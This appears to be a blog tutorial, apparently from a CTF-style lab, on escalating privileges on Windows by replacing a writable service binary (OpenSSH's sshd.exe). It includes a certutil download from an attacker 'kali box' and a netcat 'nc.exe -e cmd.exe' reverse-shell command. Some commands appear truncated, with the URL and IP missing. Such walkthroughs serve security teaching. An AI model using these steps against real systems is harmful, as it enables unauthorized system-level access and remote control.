In this post we will discuss first method to exploit a weak service using its service binary path. In this section we target service executable and its folder permission for public users.


  1. In the first step, lets see what is our username?

2. Analyzing all the groups in which our user “hackerctf” is added.

net user hackerctf

3. In step 3, Our aim must be found all services with their path using Powershell command


 $service = get-wmiobject -query ‘select * from win32_service’; echo $service.pathname

4. Don’t ever choose or look for svchost.exe binary path, always check for third party software. In this case we choose running ssh service as our target service.

5.Checking if we can enter into directory of ssh service executable path.

cd C:\Users\OpenSSH\

6. ls

7.  Running cmd.exe so that now we can perform all task from cmd shell.

In next step Lets see the folder permission for this executable and also checking if this service will start automatically during system start.


And try to copy sshd.exe into a new file name sshd2.exe on target service folder


So target service folder is writable for other user  But as we know this service is in running state so we cant delete or overwrite  our payload on target sshd.exe service executable.But we will try to rename this service.

8.Renaming the file from sshd.exe into sshd1.exe

rename sshd.exe sshd1.exe

9. Its time to build our payload for final exploitation.

10. We will use nc.exe for reverse shell and creating a shell.bat file to execute nc.exe.

11. using certutil command download the file from our kali box.

certutil -urlcache -split -f

12.Running below command to make our reverse shell payload and writing it into our shell.bat file.

cmd.exe /c “echo c:/Users/Public/OpenSSH\nc.exe -e cmd.exe 4002 > shell.bat”

13. Perfect just need to create a sshd.exe in our kali box. ANd then we will upload it on our target ssh service folder.

14. We created our sshd.exe executable for windows using mingw.

15. Downloading the our created shhd.exe malicious file directly into ssh service folder.

16.Restarting the system because of we know target service set as auto service. It means during starting the system it will start with system privileges.

Shutdown /r /t 0 for restart service as we cant do it with our low priv shell.

17. After restart

18. Done.

Share on facebook
Share on twitter
Share on linkedin
Share on whatsapp
Share on telegram
Share on pinterest

Leave a Comment